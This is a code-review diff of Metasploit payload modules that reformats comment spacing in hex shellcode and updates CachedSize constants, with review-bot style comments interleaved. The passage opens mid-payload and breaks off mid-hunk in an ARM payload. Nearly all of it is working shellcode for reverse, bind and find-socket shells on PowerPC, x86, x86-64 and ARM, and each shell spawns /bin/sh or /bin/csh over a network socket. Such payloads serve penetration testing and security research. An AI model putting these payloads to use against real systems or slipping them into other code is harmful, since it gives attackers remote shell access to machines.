"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
"\x3b\xde\xfe\x25" + # cal r30,-475(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x20" + # bctr #
"\xff\x02\x11\x5c" + # .long 0xff02115c #
"\x7f\x00\x00\x01" + # .long 0x7f000001 #
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
"\x44\xff\xff\x02" + # svca 0 #
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
"\x3b\xa0\x07\xff" + # lil r29,2047 #
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
@cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
"\x38\x9e\xff\xf8" + # cal r4,-8(r30) #
@cal_connect +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x7d\xf8\x03" +# cal r27,-2045(r29) #
"\x7f\x63\xdb\x78" +# mr r3,r27 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x3b\x7d\xf8\x03" + # cal r27,-2045(r29) #
"\x7f\x63\xdb\x78" + # mr r3,r27 #
@cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x7f\x65\xdb\x78" + # mr r5,r27 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7f\x83\xe3\x78" + # mr r3,r28 #
@cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #
"\x40\x80\xff\xd4" +# bge <cntsockcode+100> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <cntsockcode+148> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"\x37\x7b\xff\xff" + # ai. r27,r27,-1 #
"\x40\x80\xff\xd4" + # bge <cntsockcode+100> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel <cntsockcode+148> #
"\x7f\x08\x02\xa6" + # mflr r24 #
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
@cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\xc9\x03\xa6" + # mtctr r30 #
"\x4e\x80\x04\x21" + # bctrl #
"/bin/csh"
# If the payload is generated and there are offsets to substitute,

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
module MetasploitModule
CachedSize = 692904
CachedSize = 692988
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
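Review bot: CachedSize moves from 692904 to 692988 here and in the two sibling aarch64_apple_ios payloads below; this constant is compared against the length of the actually generated payload by the framework's cached-size spec, so it should come from the update_payload_cached_sizes tool rather than a hand edit, and the three stubs that wrap the same binary must agree, which they do (all read 692988).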

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
module MetasploitModule
CachedSize = 692904
CachedSize = 692988
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios'
module MetasploitModule
CachedSize = 692904
CachedSize = 692988
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -33,52 +33,52 @@ module MetasploitModule
'LPORT' => [ 20, 'n' ],
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x1c" +# pushq $0x1c #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x52" +# push %rdx #
"\x52" +# push %rdx #
"\x52" +# push %rdx #
"\xba\x00\x1c\x11\x5C" +# mov edx,0x5c111c00 #
"\x52" +# push %rdx #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x6a\x1c" +# pushq $0x1c #
"\x5a" +# pop %rdx #
"\x04\x4c" +# add $0x4c,%al #
"\x0f\x05" +# syscall #
"\x48\x31\xf6" +# xor %rsi,%rsi #
"\x6a\x6a" +# pushq $0x6a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x04\x1e" +# add $0x1e,%al #
"\x0f\x05" +# syscall #
"\x48\x89\xc7" +# mov %rax,%rdi #
"\x6a\x5a" +# pushq $0x5a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x5a" +# add $0x5a,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
"\x69\x6e\x2f\x73\x68" +# mov "in/sh",%rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x39" +# add $0x39,%al #
"\x0f\x05" # syscall #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x1c" + # pushq $0x1c #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x52" + # push %rdx #
"\x52" + # push %rdx #
"\x52" + # push %rdx #
"\xba\x00\x1c\x11\x5C" + # mov edx,0x5c111c00 #
"\x52" + # push %rdx #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x6a\x1c" + # pushq $0x1c #
"\x5a" + # pop %rdx #
"\x04\x4c" + # add $0x4c,%al #
"\x0f\x05" + # syscall #
"\x48\x31\xf6" + # xor %rsi,%rsi #
"\x6a\x6a" + # pushq $0x6a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x04\x1e" + # add $0x1e,%al #
"\x0f\x05" + # syscall #
"\x48\x89\xc7" + # mov %rax,%rdi #
"\x6a\x5a" + # pushq $0x5a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x5a" + # add $0x5a,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
"\x69\x6e\x2f\x73\x68" + # mov "in/sh",%rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x39" + # add $0x39,%al #
"\x0f\x05" # syscall #
}
))
end
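Review bot: style: `"\xba\x00\x1c\x11\x5C" + # mov edx,0x5c111c00 #` keeps an uppercase `5C` while every other escape in this block is lowercase; since the line is rewritten anyway, normalize it to `\x5c` so that a grep for the default port bytes `\x11\x5c` matches this payload the same way it matches the others.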

@ -33,50 +33,50 @@ module MetasploitModule
'LPORT' => [ 18, 'n' ],
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x02" +# pushq $0x2 #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x52" +# push %rdx #
"\xba\x00\x02\x11\x5C" +# mov edx,0x5c110200 #
"\x52" +# push %rdx #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x6a\x10" +# pushq $0x10 #
"\x5a" +# pop %rdx #
"\x04\x66" +# add $0x66,%al #
"\x0f\x05" +# syscall #
"\x48\x31\xf6" +# xor %rsi,%rsi #
"\x6a\x6a" +# pushq $0x6a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x04\x1e" +# add $0x1e,%al #
"\x0f\x05" +# syscall #
"\x48\x89\xc7" +# mov %rax,%rdi #
"\x6a\x5a" +# pushq $0x5a #
"\x58" +# pop %rax #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x5a" +# add $0x5a,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f" +# mov "//" #
"\x62\x69\x6e\x2f" +# "bin/sh" #
"\x73\x68" +# mov $0x68732f6e69622f2f,%rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x39" +# add $0x39,%al #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x02" + # pushq $0x2 #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x52" + # push %rdx #
"\xba\x00\x02\x11\x5C" + # mov edx,0x5c110200 #
"\x52" + # push %rdx #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x6a\x10" + # pushq $0x10 #
"\x5a" + # pop %rdx #
"\x04\x66" + # add $0x66,%al #
"\x0f\x05" + # syscall #
"\x48\x31\xf6" + # xor %rsi,%rsi #
"\x6a\x6a" + # pushq $0x6a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x04\x1e" + # add $0x1e,%al #
"\x0f\x05" + # syscall #
"\x48\x89\xc7" + # mov %rax,%rdi #
"\x6a\x5a" + # pushq $0x5a #
"\x58" + # pop %rax #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x5a" + # add $0x5a,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f" + # mov "//" #
"\x62\x69\x6e\x2f" + # "bin/sh" #
"\x73\x68" + # mov $0x68732f6e69622f2f,%rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x39" + # add $0x39,%al #
"\x0f\x05" # syscall #
}
))

@ -35,51 +35,51 @@ module MetasploitModule
'SCOPEID' => [ 101, 'V' ]
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x1c" +# pushq $0x1c #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x04\x3e" +# add $0x3e,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\xff\xce" +# dec %esi #
"\xff\xce" +# dec %esi #
"\x04\x58" +# add $0x58,%al #
"\x0f\x05" +# syscall #
"\xe9\x23\x00\x00\x00" +# jmpq <forth> #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x1c" + # pushq $0x1c #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x04\x3e" + # add $0x3e,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\xff\xce" + # dec %esi #
"\xff\xce" + # dec %esi #
"\x04\x58" + # add $0x58,%al #
"\x0f\x05" + # syscall #
"\xe9\x23\x00\x00\x00" + # jmpq <forth> #
# back:
"\x5e" +# pop %rsi #
"\x6a\x1c" +# pushq $0x1c #
"\x5a" +# pop %rdx #
"\x66\x83\xc0\x62" +# add $0x62,%ax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
"\x69\x6e\x2f\x73\x68" +# "in/sh",%rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x3b" +# add $0x3b,%al #
"\x0f\x05" +# syscall #
"\x5e" + # pop %rsi #
"\x6a\x1c" + # pushq $0x1c #
"\x5a" + # pop %rdx #
"\x66\x83\xc0\x62" + # add $0x62,%ax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
"\x69\x6e\x2f\x73\x68" + # "in/sh",%rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x3b" + # add $0x3b,%al #
"\x0f\x05" + # syscall #
# forth:
"\xe8\xd8\xff\xff\xff" +# callq <back> #
"\xe8\xd8\xff\xff\xff" + # callq <back> #
# sockaddr_in6
"\x00\x1c\x11\x5c" +# AF_INET6+port #
"\x00\x00\x00\x00" +# no-one-cares #
"\x00\x00\x00\x00" +# IPv6- #
"\x00\x00\x00\x00" +# addr- #
"\x00\x00\x00\x00" +# in- #
"\x00\x00\x00\x01" +# 16 bytes #
"\x00\x1c\x11\x5c" + # AF_INET6+port #
"\x00\x00\x00\x00" + # no-one-cares #
"\x00\x00\x00\x00" + # IPv6- #
"\x00\x00\x00\x00" + # addr- #
"\x00\x00\x00\x00" + # in- #
"\x00\x00\x00\x01" + # 16 bytes #
"\x00\x00\x00\x00" # Scope ID #
}
))

@ -34,43 +34,43 @@ module MetasploitModule
'LPORT' => [ 37, 'n' ],
},
'Payload' =>
"\x6a\x61" +# pushq $0x61 #
"\x58" +# pop %rax #
"\x99" +# cltd #
"\x6a\x02" +# pushq $0x2 #
"\x5f" +# pop %rdi #
"\x6a\x01" +# pushq $0x1 #
"\x5e" +# pop %rsi #
"\x0f\x05" +# syscall #
"\x48\x97" +# xchg %rax,%rdi #
"\x04\x58" +# add $0x58,%al #
"\x0f\x05" +# syscall #
"\xff\xc6" +# inc %esi #
"\x04\x59" +# add $0x59,%al #
"\x0f\x05" +# syscall #
"\xff\xce" +# dec %esi #
"\xff\xce" +# dec %esi #
"\x04\x58" +# add $0x58,%al #
"\x0f\x05" +# syscall #
"\x52" +# push %rdx #
"\x48\xbb\x00\x02\x11" +# mov ... #
"\x5c\x7f\x00\x00\x01" +# mov $0x100007f5c110200,%rbx #
"\x53" +# push %rbx #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x6a\x10" +# pushq $0x10 #
"\x5a" +# pop %rdx #
"\x66\x83\xc0\x62" +# add $0x62,%ax #
"\x0f\x05" +# syscall #
"\x99" +# cltd #
"\x52" +# push %rdx #
"\x48\xbf\x2f\x2f\x62" +# mov "//b" #
"\x69\x6e\x2f\x73\x68" +# "in/sh", %rdi #
"\x57" +# push %rdi #
"\x48\x89\xe7" +# mov %rsp,%rdi #
"\x52" +# push %rdx #
"\x57" +# push %rdi #
"\x48\x89\xe6" +# mov %rsp,%rsi #
"\x04\x3b" +# add $0x3b,%al #
"\x6a\x61" + # pushq $0x61 #
"\x58" + # pop %rax #
"\x99" + # cltd #
"\x6a\x02" + # pushq $0x2 #
"\x5f" + # pop %rdi #
"\x6a\x01" + # pushq $0x1 #
"\x5e" + # pop %rsi #
"\x0f\x05" + # syscall #
"\x48\x97" + # xchg %rax,%rdi #
"\x04\x58" + # add $0x58,%al #
"\x0f\x05" + # syscall #
"\xff\xc6" + # inc %esi #
"\x04\x59" + # add $0x59,%al #
"\x0f\x05" + # syscall #
"\xff\xce" + # dec %esi #
"\xff\xce" + # dec %esi #
"\x04\x58" + # add $0x58,%al #
"\x0f\x05" + # syscall #
"\x52" + # push %rdx #
"\x48\xbb\x00\x02\x11" + # mov ... #
"\x5c\x7f\x00\x00\x01" + # mov $0x100007f5c110200,%rbx #
"\x53" + # push %rbx #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x6a\x10" + # pushq $0x10 #
"\x5a" + # pop %rdx #
"\x66\x83\xc0\x62" + # add $0x62,%ax #
"\x0f\x05" + # syscall #
"\x99" + # cltd #
"\x52" + # push %rdx #
"\x48\xbf\x2f\x2f\x62" + # mov "//b" #
"\x69\x6e\x2f\x73\x68" + # "in/sh", %rdi #
"\x57" + # push %rdi #
"\x48\x89\xe7" + # mov %rsp,%rdi #
"\x52" + # push %rdx #
"\x57" + # push %rdi #
"\x48\x89\xe6" + # mov %rsp,%rsi #
"\x04\x3b" + # add $0x3b,%al #
"\x0f\x05" # syscall #
}
))

@ -32,43 +32,43 @@ module MetasploitModule
'LPORT' => [ 6, 'n' ],
},
'Payload' =>
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
"\x89\xe7" +# movl %esp,%edi #
"\x50" +# pushl %eax #
"\x6a\x01" +# pushl $0x01 #
"\x6a\x02" +# pushl $0x02 #
"\x6a\x10" +# pushl $0x10 #
"\xb0\x61" +# movb $0x61,%al #
"\xcd\x80" +# int $0x80 #
"\x57" +# pushl %edi #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x68" +# pushl $0x68 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x89\x47\xec" +# movl %eax,-0x14(%edi) #
"\xb0\x6a" +# movb $0x6a,%al #
"\xcd\x80" +# int $0x80 #
"\xb0\x1e" +# movb $0x1e,%al #
"\xcd\x80" +# int $0x80 #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x5a" +# pushl $0x5a #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\xff\x4f\xe4" +# decl -0x1c(%edi) #
"\x79\xf6" +# jns <bndsockcode+42> #
"\x50" +# pushl %eax #
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
"\x89\xe3" +# movl %esp,%ebx #
"\x50" +# pushl %eax #
"\x54" +# pushl %esp #
"\x53" +# pushl %ebx #
"\x50" +# pushl %eax #
"\xb0\x3b" +# movb $0x3b,%al #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
"\x89\xe7" + # movl %esp,%edi #
"\x50" + # pushl %eax #
"\x6a\x01" + # pushl $0x01 #
"\x6a\x02" + # pushl $0x02 #
"\x6a\x10" + # pushl $0x10 #
"\xb0\x61" + # movb $0x61,%al #
"\xcd\x80" + # int $0x80 #
"\x57" + # pushl %edi #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x68" + # pushl $0x68 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x89\x47\xec" + # movl %eax,-0x14(%edi) #
"\xb0\x6a" + # movb $0x6a,%al #
"\xcd\x80" + # int $0x80 #
"\xb0\x1e" + # movb $0x1e,%al #
"\xcd\x80" + # int $0x80 #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x5a" + # pushl $0x5a #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\xff\x4f\xe4" + # decl -0x1c(%edi) #
"\x79\xf6" + # jns <bndsockcode+42> #
"\x50" + # pushl %eax #
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
"\x89\xe3" + # movl %esp,%ebx #
"\x50" + # pushl %eax #
"\x54" + # pushl %esp #
"\x53" + # pushl %ebx #
"\x50" + # pushl %eax #
"\xb0\x3b" + # movb $0x3b,%al #
"\xcd\x80" # int $0x80 #
}
))

@ -32,38 +32,38 @@ module MetasploitModule
'CPORT' => [ 25, 'n' ],
},
'Payload' =>
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x89\xe7" +# movl %esp,%edi #
"\x6a\x10" +# pushl $0x10 #
"\x54" +# pushl %esp #
"\x57" +# pushl %edi #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x58" +# popl %eax #
"\x58" +# popl %eax #
"\x40" +# incl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x1f" +# pushl $0x1f #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x66\x81\x7f\x02\x04\xd2"+# cmpw $0xd204,0x02(%edi) #
"\x75\xee" +# jne <fndsockcode+11> #
"\x50" +# pushl %eax #
"\x6a\x5a" +# pushl $0x5a #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\xff\x4f\xf0" +# decl -0x10(%edi) #
"\x79\xf6" +# jns <fndsockcode+30> #
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
"\x89\xe3" +# movl %esp,%ebx #
"\x50" +# pushl %eax #
"\x54" +# pushl %esp #
"\x53" +# pushl %ebx #
"\x50" +# pushl %eax #
"\xb0\x3b" +# movb $0x3b,%al #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x89\xe7" + # movl %esp,%edi #
"\x6a\x10" + # pushl $0x10 #
"\x54" + # pushl %esp #
"\x57" + # pushl %edi #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x58" + # popl %eax #
"\x58" + # popl %eax #
"\x40" + # incl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x1f" + # pushl $0x1f #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x66\x81\x7f\x02\x04\xd2"+ # cmpw $0xd204,0x02(%edi) #
"\x75\xee" + # jne <fndsockcode+11> #
"\x50" + # pushl %eax #
"\x6a\x5a" + # pushl $0x5a #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\xff\x4f\xf0" + # decl -0x10(%edi) #
"\x79\xf6" + # jns <fndsockcode+30> #
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
"\x89\xe3" + # movl %esp,%ebx #
"\x50" + # pushl %eax #
"\x54" + # pushl %esp #
"\x53" + # pushl %ebx #
"\x50" + # pushl %eax #
"\xb0\x3b" + # movb $0x3b,%al #
"\xcd\x80" # int $0x80 #
}
))
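Review bot: style: `"\x66\x81\x7f\x02\x04\xd2"+ # cmpw $0xd204,0x02(%edi) #` is the one line in this hunk where the `+` is still glued to the closing quote; the fix added the space after the `+` but not before it, so it should read `"\x66\x81\x7f\x02\x04\xd2" + #` like the rest of the block.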

@ -33,36 +33,36 @@ module MetasploitModule
'LPORT' => [ 8, 'n' ],
},
'Payload' =>
"\x68\x7f\x00\x00\x01" +# pushl $0x0100007f #
"\x68\xff\x02\x04\xd2" +# pushl $0xd20402ff #
"\x89\xe7" +# movl %esp,%edi #
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x6a\x01" +# pushl $0x01 #
"\x6a\x02" +# pushl $0x02 #
"\x6a\x10" +# pushl $0x10 #
"\xb0\x61" +# movb $0x61,%al #
"\xcd\x80" +# int $0x80 #
"\x57" +# pushl %edi #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x6a\x62" +# pushl $0x62 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x50" +# pushl %eax #
"\x6a\x5a" +# pushl $0x5a #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\xff\x4f\xe8" +# decl -0x18(%edi) #
"\x79\xf6" +# jns <cntsockcode+34> #
"\x68\x2f\x2f\x73\x68" +# pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" +# pushl $0x6e69622f #
"\x89\xe3" +# movl %esp,%ebx #
"\x50" +# pushl %eax #
"\x54" +# pushl %esp #
"\x53" +# pushl %ebx #
"\x50" +# pushl %eax #
"\xb0\x3b" +# movb $0x3b,%al #
"\x68\x7f\x00\x00\x01" + # pushl $0x0100007f #
"\x68\xff\x02\x04\xd2" + # pushl $0xd20402ff #
"\x89\xe7" + # movl %esp,%edi #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x6a\x01" + # pushl $0x01 #
"\x6a\x02" + # pushl $0x02 #
"\x6a\x10" + # pushl $0x10 #
"\xb0\x61" + # movb $0x61,%al #
"\xcd\x80" + # int $0x80 #
"\x57" + # pushl %edi #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x6a\x62" + # pushl $0x62 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\x50" + # pushl %eax #
"\x6a\x5a" + # pushl $0x5a #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
"\xff\x4f\xe8" + # decl -0x18(%edi) #
"\x79\xf6" + # jns <cntsockcode+34> #
"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
"\x89\xe3" + # movl %esp,%ebx #
"\x50" + # pushl %eax #
"\x54" + # pushl %esp #
"\x53" + # pushl %ebx #
"\x50" + # pushl %eax #
"\xb0\x3b" + # movb $0x3b,%al #
"\xcd\x80" # int $0x80 #
}
))

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 967896
CachedSize = 968136
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 967896
CachedSize = 968136
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 967896
CachedSize = 968136
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 902868
CachedSize = 902904
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 902868
CachedSize = 902904
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux'
module MetasploitModule
CachedSize = 902868
CachedSize = 902904
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -41,74 +41,74 @@ module MetasploitModule
payload =
# turning on thumb mode
"\xe2\x8f\x60\x01" +# add r6, pc, #1 #
"\xe1\x2f\xff\x16" +# bx r6 #
"\xe2\x8f\x60\x01" + # add r6, pc, #1 #
"\xe1\x2f\xff\x16" + # bx r6 #
# thumb mode on
# socket(2,1,0)
"\x1a\x92" +# sub r2, r2, r2 #
"\x1c\x51" +# add r1, r2, #1 #
"\x1c\x90" +# add r0, r2, #2 #
"\x02\x0f" +# lsl r7, r1, #8 #
"\x37\x19" +# add r7, r7, #0x19 #
"\xdf\x01" +# svc 1 #
"\x1c\x06" +# mov r6, r0 #
"\x1a\x92" + # sub r2, r2, r2 #
"\x1c\x51" + # add r1, r2, #1 #
"\x1c\x90" + # add r0, r2, #2 #
